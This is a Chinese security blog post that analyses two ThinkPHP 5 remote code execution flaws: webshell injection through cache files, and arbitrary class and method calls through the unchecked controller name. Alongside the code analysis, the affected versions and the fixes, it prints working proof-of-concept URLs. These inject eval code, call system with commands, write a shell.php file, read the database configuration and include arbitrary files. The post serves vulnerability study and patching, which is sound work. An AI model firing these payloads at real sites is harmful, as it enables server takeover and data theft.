<!DOCTYPE html>
<html lang="en">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="m0nk3y">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="m0nk3y">
    
    <meta name="keywords" content="信息安全,CTF,攻防对抗,代码审计,安全研究,渗透测试">
    
    <meta name="description" content="">
    <meta name="description" content="主要参考资料： https:&#x2F;&#x2F;github.com&#x2F;Mochazz&#x2F;ThinkPHP-Vuln&#x2F; RCE1(利用缓存文件GetShell从而RCE)相关参考资料：https:&#x2F;&#x2F;www.cnblogs.com&#x2F;zpchcbd&#x2F;p&#x2F;12546340.html POC1http:&#x2F;&#x2F;thinkphp5:8888&#x2F;public&#x2F;?username&#x3D;te">
<meta property="og:type" content="article">
<meta property="og:title" content="ThinkPHP5漏洞学习-RCE">
<meta property="og:url" content="https://hack-for.fun/a45.html">
<meta property="og:site_name" content="可惜没如果、m0nk3y‘s Blog">
<meta property="og:description" content="主要参考资料： https:&#x2F;&#x2F;github.com&#x2F;Mochazz&#x2F;ThinkPHP-Vuln&#x2F; RCE1(利用缓存文件GetShell从而RCE)相关参考资料：https:&#x2F;&#x2F;www.cnblogs.com&#x2F;zpchcbd&#x2F;p&#x2F;12546340.html POC1http:&#x2F;&#x2F;thinkphp5:8888&#x2F;public&#x2F;?username&#x3D;te">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172609.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172619.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172420.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923160412.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172411.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172318.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172308.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172114.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172102.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172037.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923173430.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923160412.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150733.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923224451.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232824.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150312.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150235.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150152.png">
<meta property="og:image" content="https://github.com/Mochazz/ThinkPHP-Vuln/raw/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C9/8.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923224451.png">
<meta property="article:published_time" content="2020-09-23T03:04:09.000Z">
<meta property="article:modified_time" content="2020-09-27T13:39:21.764Z">
<meta property="article:author" content="m0nk3y">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="RCE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172609.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    
    <title>ThinkPHP5漏洞学习-RCE · m0nk3y&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200825203605.JPG" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="可惜没如果、m0nk3y‘s Blog" type="application/atom+xml">
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >M0nk3y&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">ThinkPHP5漏洞学习-RCE</a>
            </div>
    </div>
    
    <a class="home-link" href=/>M0nk3y's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200825211012.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            ThinkPHP5漏洞学习-RCE
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "代码审计">代码审计</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "RCE">RCE</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">3.4k</span>Reading time: <span class="post-count reading-time">15 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2020/09/23</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>主要参考资料：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/Mochazz/ThinkPHP-Vuln/">https://github.com/Mochazz/ThinkPHP-Vuln/</a></p>
<h1 id="RCE1-利用缓存文件GetShell从而RCE"><a href="#RCE1-利用缓存文件GetShell从而RCE" class="headerlink" title="RCE1(利用缓存文件GetShell从而RCE)"></a>RCE1(利用缓存文件GetShell从而RCE)</h1><p>相关参考资料：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/zpchcbd/p/12546340.html">https://www.cnblogs.com/zpchcbd/p/12546340.html</a></p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;thinkphp5:8888&#x2F;public&#x2F;?username&#x3D;test%0d%0a@eval($_GET[_]);&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172609.png" alt="image-20200923114608784"></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172619.png" alt="image-20200923124814752"></p>
<h2 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><blockquote>
<p>漏洞存在于 <strong>ThinkPHP</strong> 的缓存类中。该类会将缓存数据通过序列化的方式，直接存储在 <code>.php</code> 文件中，攻击者通过精心构造的 <strong>payload</strong> ，即可将 <strong>webshell</strong> 写入缓存文件。缓存文件的名字和目录均可预测出来，一旦缓存目录可访问或结合任意文件包含漏洞，即可触发 <strong>远程代码执行漏洞</strong> 。</p>
</blockquote>
<p>漏洞利用前提：</p>
<ul>
<li><p>站点能够将缓存文件列出，并且用户可以得到路径</p>
</li>
<li><p>1、缓存使用文件方式并且缓存目录暴露在web目录下面<br>2、攻击者要能猜到开发者使用的缓存key</p>
</li>
<li><p>知道缓存类所设置的键名，这样才能找到 <strong>webshell</strong> 路径；其次如果按照官方说明开发程序， <strong>webshell</strong> 最终会被写到 <strong>runtime</strong> 目录下，而官方推荐 <strong>public</strong> 作为 <strong>web</strong> 根目录，所以即便我们写入了 <strong>shell</strong> ，也无法直接访问到；最后如果程序有设置 <strong>$this-&gt;options[‘prefix’]</strong> 的话，在没有源码的情况下，我们还是无法获得 <strong>webshell</strong> 的准确路径。</p>
</li>
<li><blockquote>
<p>5.0的部署建议是public目录作为web目录访问内容，其它都是web目录之外，当然，你必须要修改public/index.php中的相关路径</p>
</blockquote>
</li>
</ul>
<p>比如这里修改的index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">app</span>\<span class="title">index</span>\<span class="title">controller</span>;</span><br><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">Cache</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Index</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        Cache::set(<span class="string">&quot;name&quot;</span>,input(<span class="string">&quot;get.username&quot;</span>));</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Cache success&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h2><p><strong>5.0.0&lt;=ThinkPHP5&lt;=5.0.10</strong></p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>在ThinkPHP 的5.0.11 release 信息中：</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172420.png" alt="image-20200923125619050"></p>
<p>更新了完善缓存驱动(安全更新)。再去查看commit记录。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923160412.png" alt="image-20200923130139007"></p>
<p>修复方式为将缓存文件的内容拼接到<code>&lt;?php ?&gt;</code> 标签之外，并且使用了<code>exit()</code>函数来退出当前脚本。</p>
<p>可下断点进行单步调试，观察整个参数在Cache类以及Request类下进过相关方法的过滤，转换，并最终写入了缓存文件的过程。</p>
<p>首先是<code>Cache::set(&quot;name&quot;,input(&quot;get.username&quot;));</code> 未实例化，所以为调用<code>autoload</code>方法，自动加载机制来进行一系列实例化操作。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172411.png" alt="image-20200923161825336"></p>
<p>然后到helper.php 中的 <code>input</code>方法，判断请求的方法和请求的参数，此处为<code>get.username</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172318.png" alt="image-20200923162505424"></p>
<p>然后返回过滤后的值，继续调用<code>Request</code> 类的 <code>get</code> 方法和 <code>Input</code> 方法（在TP5)中参数的处理都是这样的了，</p>
<p>经过<code>filterVaule</code>和<code>filterExp</code>函数进行特殊字符过滤和相关判段后返回给<code>$data</code></p>
<hr>
<p>然后来到Cache 类的<code>set</code>方法。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172308.png" alt="image-20200923164241136"></p>
<p>调用了Cache 类的init 方法，该方法继续调用了 Config里的get方法，这些操作是在为缓存内容做一些初始化操作。然后再到Cache 类的 connect 方法，</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172114.png" alt="image-20200923164824257"></p>
<p>为缓存文件的文件名进行md5返回。这里的<code>self::handler</code>为<code>think\cache\driver\File</code>类。所以会调用<code>File</code>类的<code>set</code>方法。该方法调用了<code>getCacheKey</code>方法来获取缓存文件的文件名。文件名的机制如下图，先是对<code>$name</code> md5，然后截取前两位作为目录名，后面部分作为文件名然后和<code>.php</code>后缀进行拼接。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172102.png" alt="image-20200923165836437"></p>
<p>看看set方法的处理流程：</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923172037.png" alt="image-20200923170741256"></p>
<p>最后通过<code>file_put_contents</code>函数，将<code>$data</code>（参数内容可控，并且没有对data参数进行任何过滤等操作，只是序列化后拼接存储在文件中，这里的 <strong>$this-&gt;options[‘data_compress’]</strong> 变量默认情况下为 <strong>false</strong> ，所以数据不会经过 <strong>gzcompress</strong> 函数处理。虽然在序列化数据前面拼接了单行注释符 <strong>//</strong> ，但是我们可以通过注入换行符绕过该限制。） 写入<code>$filename</code>从而GetShell。</p>
<blockquote>
<p>最后如果程序有设置 <strong>$this-&gt;options[‘prefix’]</strong> 的话(也就是上上图中的设置文件名前缀的代码)，在没有源码的情况下，我们还是无法获得 <strong>webshell</strong> 的准确路径。</p>
</blockquote>
<h2 id="利用总结"><a href="#利用总结" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923173430.png"></p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>1，thinkphp3.2的版本请选择开启：DATA_CACHE_KEY 这样就算你使用的cms是开源的人家发现了这个也无法使用。<br>2，tp3.2-tp5  做好目录权限，除公共目录绝对不要让外部可访问</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923160412.png" alt="image-20200923130139007"></p>
<h1 id="RCE2-利用任意控制器调用RCE"><a href="#RCE2-利用任意控制器调用RCE" class="headerlink" title="RCE2(利用任意控制器调用RCE)"></a>RCE2(利用任意控制器调用RCE)</h1><blockquote>
<p>控制器过滤不严，结合直接返回类名的代码操作，导致可以用命名空间的方式来调用任意类的任意方法</p>
</blockquote>
<p>获取复现代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">composer create-project --prefer-dist topthink&#x2F;think&#x3D;5.1.0 tpdemo</span><br></pre></td></tr></table></figure>

<p>修改composer.json 的  require 字段。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;require&quot;: &#123;</span><br><span class="line">    &quot;php&quot;: &quot;&gt;&#x3D;5.6.0&quot;,</span><br><span class="line">    &quot;topthink&#x2F;framework&quot;: &quot;5.1.30&quot;</span><br><span class="line">&#125;,</span><br></pre></td></tr></table></figure>

<p>composer update</p>
<p>相关参考资料：</p>
<p><strong>感觉自己分析的不好，要学习还是去看参考资料吧。</strong></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3570">https://xz.aliyun.com/t/3570</a></p>
<p><a target="_blank" rel="noopener" href="https://www.smi1e.top/thinkphp-5-x-rce-%E5%88%86%E6%9E%90/">https://www.smi1e.top/thinkphp-5-x-rce-%E5%88%86%E6%9E%90/</a></p>
<h2 id="POC-1"><a href="#POC-1" class="headerlink" title="POC"></a>POC</h2><p><strong>5.1.x</strong> ：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?s&#x3D;index&#x2F;\think\Request&#x2F;input&amp;filter[]&#x3D;system&amp;data&#x3D;pwd</span><br><span class="line">?s&#x3D;index&#x2F;\think\view\driver\Php&#x2F;display&amp;content&#x3D;&lt;?php phpinfo();?&gt;</span><br><span class="line">?s&#x3D;index&#x2F;\think\template\driver\file&#x2F;write&amp;cacheFile&#x3D;shell.php&amp;content&#x3D;&lt;?php phpinfo();?&gt;</span><br><span class="line">?s&#x3D;index&#x2F;\think\Container&#x2F;invokefunction&amp;function&#x3D;call_user_func_array&amp;vars[0]&#x3D;system&amp;vars[1][]&#x3D;id</span><br><span class="line">?s&#x3D;index&#x2F;\think\app&#x2F;invokefunction&amp;function&#x3D;call_user_func_array&amp;vars[0]&#x3D;system&amp;vars[1][]&#x3D;id</span><br></pre></td></tr></table></figure>

<p><strong>5.0.x</strong> ：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?s&#x3D;index&#x2F;think\config&#x2F;get&amp;name&#x3D;database.username # 获取配置信息</span><br><span class="line">?s&#x3D;index&#x2F;\think\Lang&#x2F;load&amp;file&#x3D;..&#x2F;..&#x2F;test.jpg    # 包含任意文件</span><br><span class="line">?s&#x3D;index&#x2F;\think\Config&#x2F;load&amp;file&#x3D;..&#x2F;..&#x2F;t.php     # 包含任意.php文件</span><br><span class="line">?s&#x3D;index&#x2F;\think\app&#x2F;invokefunction&amp;function&#x3D;call_user_func_array&amp;vars[0]&#x3D;system&amp;vars[1][]&#x3D;id</span><br></pre></td></tr></table></figure>

<p>这里以以这个POC进行分析，ThinkPHP 版本为<code>5.1.30</code> </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;public&#x2F;index.php?s&#x3D;index&#x2F;\think\Container&#x2F;invokefunction&amp;function&#x3D;call_user_func_array&amp;vars[0]&#x3D;phpinfo&amp;vars[1][]&#x3D;1</span><br></pre></td></tr></table></figure>

<p>![image-20200923201833962](/Users/m0nk3y/Library/Application Support/typora-user-images/image-20200923201833962.png)</p>
<h2 id="漏洞概述-1"><a href="#漏洞概述-1" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><blockquote>
<p>漏洞存在于 <strong>ThinkPHP</strong> 底层没有对控制器名进行很好的合法性校验，导致在未开启强制路由的情况下，用户可以调用任意类的任意方法，最终导致 <strong>远程代码执行漏洞</strong> 的产生。</p>
</blockquote>
<h2 id="影响版本-1"><a href="#影响版本-1" class="headerlink" title="影响版本"></a>影响版本</h2><p><strong>5.0.7&lt;=ThinkPHP5&lt;=5.0.22</strong> 、<strong>5.1.0&lt;=ThinkPHP&lt;=5.1.30</strong></p>
<p>不同版本的Payload，需要做相关的调整。</p>
<h2 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>在5.1.31的更新中，查看相关更新的信息，其中关于<code>修正控制器名获取</code> 的commit</p>
<p>![image-20200923221710652](/Users/m0nk3y/Library/Application Support/typora-user-images/image-20200923221710652.png)</p>
<p>另外，官方对于此处更新，专门发了一次微信公告。<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/ie9Evj1Cedw4OomgkJug5A">https://mp.weixin.qq.com/s/ie9Evj1Cedw4OomgkJug5A</a></p>
<p>内容如下：</p>
<blockquote>
<p>本次版本更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的<code>getshell</code>漏洞，受影响的版本包括<code>5.0</code>和<code>5.1</code>版本，推荐尽快更新到最新版本。如果暂时无法更新到最新版本，请开启强制路由。</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150733.png" alt="image-20200923225433768"></p>
<p>默认情况下，ThinkPHP 不开启强制路由，并且开启了路由器兼容模式，<code>s</code>。</p>
<p>5.1.31 修复地址：<a target="_blank" rel="noopener" href="https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815">https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923224451.png" alt="image-20200923224445456"></p>
<p>两个关键点：</p>
<ul>
<li>控制器名</li>
<li>强制路由</li>
</ul>
<p>by 七月火师傅：</p>
<blockquote>
<p>在没有开启强制路由，说明我们可以使用路由兼容模式 <strong>s</strong> 参数，而框架对控制器名没有进行足够的检测，说明可能可以调用任意的控制器，那么我们可以试着利用 <code>http://site/?s=模块/控制器/方法</code> 来测试一下。在先前的 <strong>ThinkPHP SQL注入</strong> 分析文章中，我们都有提到所有用户参数都会经过 <strong>Request</strong> 类的 <strong>input</strong> 方法处理，该方法会调用 <strong>filterValue</strong> 方法，而 <strong>filterValue</strong> 方法中使用了 <strong>call_user_func</strong> ，那么我们就来尝试利用这个方法。</p>
</blockquote>
<p><a href="https://hack-for.fun/69fea760.html#SQL%E6%B3%A8%E5%85%A5%E5%9B%9B-select">https://hack-for.fun/69fea760.html#SQL%E6%B3%A8%E5%85%A5%E5%9B%9B-select</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232824.png"></p>
<p><code>call_user_func($filter,$value);</code></p>
